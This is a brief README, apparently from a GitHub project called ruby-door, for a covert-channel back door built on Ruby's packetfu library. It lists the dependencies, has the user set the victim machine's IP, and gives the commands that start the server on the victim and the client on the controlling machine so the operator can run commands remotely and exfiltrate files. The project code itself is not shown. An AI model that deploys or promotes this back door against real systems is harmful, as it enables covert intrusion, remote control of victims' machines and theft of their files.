A covert channel back door using ruby's packetfu library.
- Ruby version 1.9.3p327 or higher (not tested on lower versions yet)
- First, get ruby package manager (RVM)
- Then install latest Ruby
- First, get ruby package manager (RVM)
- Libpcap and Libpcap-devel (required for pcaprub)
- Pcaprub (Used by packetfu)
- Packetfu
- Open up both server.rb and client.rb to change the following:
- dstIP (IP of the victim machine)
- srcIP (IP of the client)
- interFace (interface name)
- On the victim machine, start the application via:
- ruby src/server/server.rb
- On the client machine, run:
- ruby src/client/client.rb
- That's it! You can now execute commands on the server & exfiltrate files.
If you want to contribute, put in a request at: - https://github.com/BryceEWatson/ruby-door